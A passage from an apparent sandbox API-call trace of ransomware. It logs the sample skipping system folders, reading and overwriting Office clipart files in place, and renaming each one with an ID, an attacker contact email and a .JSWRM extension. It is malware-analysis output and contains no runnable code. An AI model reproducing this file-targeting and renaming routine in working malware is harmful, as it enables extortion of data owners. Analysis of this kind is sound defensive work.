hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b00, lpOverlapped=0x0) returned 1 [0089.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.464] CloseHandle (hObject=0x314) returned 1 [0089.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0089.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0089.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0089.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0089.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.465] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.466] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x423a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0315612.JPG", cAlternateFileName="")) returned 1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2=".") returned 1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="..") returned 1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="...") returned 1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="windows") returned -1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="recovery") returned -1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="perflogs") returned -1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="documents and settings") returned 1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="system volume information") returned -1 [0089.466] lstrcmpiW (lpString1="J0315612.JPG", lpString2="msocache") returned -1 [0089.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315612.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315612.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0315612.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0089.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315612.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0315612.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0315612.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0089.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0089.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.467] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16954) returned 1 [0089.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4230) returned 0x24d210 [0089.467] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4230, lpOverlapped=0x0) returned 1 [0089.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.470] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4230, lpOverlapped=0x0) returned 1 [0089.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.471] CloseHandle (hObject=0x314) returned 1 [0089.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0089.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0089.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0089.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0089.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.472] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4180, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0318448.WMF", cAlternateFileName="")) returned 1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2=".") returned 1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="..") returned 1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="...") returned 1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="windows") returned -1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="recovery") returned -1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="perflogs") returned -1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="documents and settings") returned 1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="system volume information") returned -1 [0089.472] lstrcmpiW (lpString1="J0318448.WMF", lpString2="msocache") returned -1 [0089.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0089.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318448.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318448.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0318448.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0089.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0089.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318448.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318448.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0318448.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0089.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0089.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0089.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.473] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16768) returned 1 [0089.473] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4180) returned 0x24d210 [0089.473] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4180, lpOverlapped=0x0) returned 1 [0089.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.475] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4180, lpOverlapped=0x0) returned 1 [0089.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.476] CloseHandle (hObject=0x314) returned 1 [0089.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0089.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0089.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0089.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0089.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0089.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0089.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.477] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dfa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0318804.WMF", cAlternateFileName="")) returned 1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2=".") returned 1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="..") returned 1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="...") returned 1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="windows") returned -1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="recovery") returned -1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="perflogs") returned -1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="documents and settings") returned 1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="system volume information") returned -1 [0089.477] lstrcmpiW (lpString1="J0318804.WMF", lpString2="msocache") returned -1 [0089.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0089.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318804.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318804.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0318804.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0089.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318804.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0318804.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0318804.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0089.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.489] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11770) returned 1 [0089.489] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2df0) returned 0x24d210 [0089.489] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2df0, lpOverlapped=0x0) returned 1 [0089.492] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.492] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2df0, lpOverlapped=0x0) returned 1 [0089.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.492] CloseHandle (hObject=0x314) returned 1 [0089.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0089.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0089.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0089.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0089.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.492] MoveFileW 